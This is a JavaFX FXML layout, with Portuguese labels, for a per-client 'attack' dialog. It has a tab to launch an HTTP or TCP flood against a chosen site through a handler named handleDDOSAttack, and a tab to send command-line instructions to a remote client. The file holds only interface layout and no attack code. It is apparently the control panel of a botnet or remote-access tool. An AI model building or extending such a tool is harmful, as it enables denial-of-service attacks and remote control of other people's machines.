<?xml version="1.0" encoding="UTF-8"?>

<?import javafx.geometry.Insets?>
<?import javafx.scene.control.*?>
<?import javafx.scene.layout.*?>
<?import javafx.scene.text.Font?>
<AnchorPane xmlns:fx="http://javafx.com/fxml/1" prefHeight="207.0" prefWidth="611.0" styleClass="background"
            stylesheets="@../styles/DarkTheme.css" xmlns="http://javafx.com/javafx/9.0.1"
            fx:controller="br.com.controller.ClientAttackDialogController">
    <children>
        <GridPane prefHeight="30.0" prefWidth="600.0">
            <columnConstraints>
                <ColumnConstraints hgrow="SOMETIMES" maxWidth="292.79998779296875" minWidth="10.0"
                                   prefWidth="109.39998779296874"/>
                <ColumnConstraints hgrow="SOMETIMES" maxWidth="492.79998779296875" minWidth="10.0"
                                   prefWidth="423.0000122070312"/>
            </columnConstraints>
            <rowConstraints>
                <RowConstraints maxHeight="126.20001831054688" minHeight="0.0" prefHeight="45.0" vgrow="SOMETIMES"/>
            </rowConstraints>
            <children>
                <Label prefHeight="18.0" prefWidth="96.0" text="Nome:">
                    <font>
                        <Font size="20.0"/>
                    </font>
                    <GridPane.margin>
                        <Insets left="5.0"/>
                    </GridPane.margin>
                </Label>
                <Label fx:id="clientName" maxHeight="60.0" maxWidth="400.0" minHeight="60.0" minWidth="400.0"
                       prefHeight="60.0" prefWidth="400.0" text="name" GridPane.columnIndex="1">
                    <font>
                        <Font size="20.0"/>
                    </font>
                </Label>
            </children>
        </GridPane>
        <Button fx:id="btnCancelar" layoutX="507.0" layoutY="-1.0" mnemonicParsing="false" onAction="#handleCancel"
                prefHeight="282.0" prefWidth="104.0" text="Cancelar"/>
        <TabPane layoutY="43.0" prefHeight="239.0" prefWidth="508.0" styleClass="column-header-background"
                 tabClosingPolicy="UNAVAILABLE">
            <tabs>
                <Tab text="Ataque">
                    <content>
                        <AnchorPane minHeight="0.0" minWidth="0.0" prefHeight="170.0" prefWidth="489.0">
                            <children>
                                <Button fx:id="btnAtacarUrl" layoutX="15.0" layoutY="69.0" mnemonicParsing="false"
                                        onAction="#handleDDOSAttack" prefHeight="51.0" prefWidth="478.0"
                                        styleClass="buttonAttack" text="Atacar"/>
                                <Label layoutX="39.0" layoutY="29.0" text="Site"/>
                                <TextField fx:id="TFUrl" layoutX="79.0" layoutY="22.0" onAction="#handleDDOSAttack"
                                           prefHeight="38.0" prefWidth="266.0"/>
                                <Button fx:id="btnAbrirUrl" layoutX="39.0" layoutY="123.0" mnemonicParsing="false"
                                        onAction="#handleOpenUrl" prefHeight="34.0" prefWidth="430.0" text="Abrir"/>
                                <Slider fx:id="sliderRequisitionQuantity" blockIncrement="1.0" layoutX="354.0"
                                        layoutY="31.0" max="10.0" min="1.0" showTickLabels="true" showTickMarks="true"
                                        value="1.0"/>
                                <RadioButton fx:id="httpAttackRadio" layoutX="13.0" layoutY="174.0"
                                             mnemonicParsing="false" selected="true" text="HTTP" textFill="WHITE"/>
                                <RadioButton fx:id="tcpAttackRadio" layoutX="86.0" layoutY="174.0"
                                             mnemonicParsing="false" text="TCP" textFill="WHITE"/>
                            </children>
                        </AnchorPane>
                    </content>
                </Tab>
                <Tab text="Prompt CMD">
                    <content>
                        <AnchorPane minHeight="0.0" minWidth="0.0" prefHeight="180.0" prefWidth="200.0">
                            <children>
                                <Label layoutX="44.0" layoutY="57.0" text="CMD"/>
                                <TextField fx:id="TFCmd" layoutX="95.0" layoutY="49.0" onAction="#handleCMD"
                                           prefHeight="38.0" prefWidth="394.0"/>
                                <Button fx:id="btnEnviarCmd" layoutX="13.0" layoutY="102.0" mnemonicParsing="false"
                                        onAction="#handleCMD" prefHeight="34.0" prefWidth="482.0" text="Enviar"/>
                            </children>
                        </AnchorPane>
                    </content>
                </Tab>
            </tabs>
        </TabPane>
    </children>
</AnchorPane>
